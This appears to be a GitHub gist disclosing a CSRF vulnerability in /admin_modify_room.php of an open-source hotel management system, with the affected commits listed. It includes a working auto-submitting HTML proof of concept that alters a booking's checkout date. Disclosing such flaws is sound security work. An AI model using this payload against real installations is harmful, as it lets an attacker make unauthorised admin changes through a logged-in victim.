Skip to content

Instantly share code, notes, and snippets.

@topsky979
Created July 20, 2024 14:00
Show Gist options
  • Save topsky979/0785597ae7abc8f10cd5c5537f5467b5 to your computer and use it in GitHub Desktop.
Save topsky979/0785597ae7abc8f10cd5c5537f5467b5 to your computer and use it in GitHub Desktop.

[description]

Hotel-Management-System was discovered to contain Cross-site request forgery(CSRF) vulnerability via the URI /admin_modify_room.php.


[Vulnerability Type]

Cross-site request forgery(CSRF)


[Vendor of Product]

Hotel-Management-System,https://github.com/vaibhavverma9999/Hotel-Management-System


[Affected Product Code Base]

commit<=91caab8e505a1791780594d23408fb31fcc272cc


[Impact Escalation of Privileges]

true


[POC]

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/admin_modify_room.php" method="POST">
      <input type="hidden" name="book&#95;id" value="10017" />
      <input type="hidden" name="checkout" value="2024&#45;07&#45;20" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment